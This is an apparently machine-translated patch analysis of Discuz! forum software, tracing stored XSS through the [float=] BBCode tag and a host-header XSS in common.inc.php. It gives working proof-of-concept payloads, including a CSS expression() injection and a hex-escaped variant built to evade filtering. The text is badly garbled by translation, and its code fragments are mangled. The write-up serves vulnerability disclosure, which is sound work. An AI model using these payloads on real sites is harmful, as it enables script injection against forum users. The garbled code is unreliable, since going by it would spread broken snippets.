Compared with patches, we found in \ include \ discuzcode. func. php:
$ Discuzcodes ['searcharray'] ['bbcode _ Regexp '] = array (// The regular expression of the tag
"/\ [Align = ([^ \ [\ <] + ?) \]/I ", ----> before Patching
"/\ [Float = ([^ \ [\ <] + ?) \]/I"
|
V
"/\ [Align = (left | center | right) \]/I", ----> after patching
"/\ [Float = (left | right) \]/I"
Continue to see that the following codz is used to process the two tags:
$ Discuzcodes ['replace earray'] ['bbcode _ Regexp '] = array (// Replace the Regular Expression
........
"<P align = \" \ 1 \ "> ",
"<Br style = \" clear: Both \ "> <span style = \" float: \ 1; \ ">"
Replaced code:
$ Message = str_replace ($ discuzcodes ['searcharray'] ['bbcode _ str'],
$ Discuzcodes ['replace earray'] ['bbcode _ str'],
Preg_replace (
($ Parsetype! = 1 & $ allowbbcode = 2 & $ globals ['_ dcache'] ['bbcode']? Array_merge ($ discuzcodes ['searcharray'] ['bbcode _ Regexp '], $ globals [' _ dcache '] ['bbcodes'] ['searcharray']): $ discuzcodes ['searcharray'] ['bbcode _ Regexp ']),
($ Parsetype! = 1 & $ allowbbcode = 2 & $ globals ['_ dcache'] ['bbcode']? Array_merge ($ discuzcodes ['replace earray'] ['bbcode _ Regexp '], $ globals [' _ dcache '] ['bbcode'] ['replace earray']): $ discuzcodes ['replace earray'] ['bbcode _ Regexp ']),
$ Message ));
After testing, it is found that $ message has been processed by htmlspecialchars or similar functions before it enters str_replace. So there is no way to use "and <>
This means "/\ [align = ([^ \ [\ <] + ?) \]/I "-->" <p align = \ "\ 1 \"> "cannot be used" <>. Let's look at the float label again:
"/\ [Float = ([^ \ [\ <] + ?) \]/I "-->" <br style = \ "clear: Both \"> <span style = \ "float: \ 1; \">"
After replacement, \ 1 enters <span style =. Using expression () in Haha style = does not require "close and :).
Test codz:
[Float = expression (Alert (123456789)] test [/float]
The above is just a basket. In view of the fact that many ox and ox have BS, there are indeed some situations where the basket cannot be used, because alert (123456789) this contains no special sensitive symbols. Let's take a look at "/\ [float = ([^ \ [\ <] + ?) \]/I "the extracted regular expression does not have any special filtering, but $ message is htmlchars before it is replaced.
Therefore, it is completely usable, such:
[Float = \ 65 \ 78 \ 70 \ 72 \ 65 \ 73 \ 73 \ 69 \ 6f \ 6e \ 28 \ 61 \ 6C \ 65 \ 72 \ 74 \ 28 \ 31 \ 32 \ 33 \ 34 \ 35 \ 36 \ 37 \ 38 \ 39 \ 29 \ 29] test [/float]
But I still play the basket :).
Afterwards: some code in the discuzcode of DZ is really poorly written [I mean code style]. I guess the person in charge of code security of DZ is also depressed, is the vulnerability invisible? Pure yy ...... However, the black box test on XSS is more convenient than the code. [some people will be very happy to see this.]
Another XSS supplemented by dz0724 patch
\ Include \ common. Inc. php:
$ Boardurl = 'HTTP: // '. $ _ server ['HTTP _ host']. preg_replace ("// \/+ (API | archiver | WAP )? \/* $/I ",'', substr ($ php_self, 0, strrpos ($ php_self ,'/'))).'/';
$ Boardurl = htmlspecialchars ('HTTP: // '. $ _ server ['HTTP _ host']. preg_replace ("// \/+ (API | archiver | WAP )? \/* $/I ",'', substr ($ php_self, 0, strrpos ($ php_self ,'/'))).'/');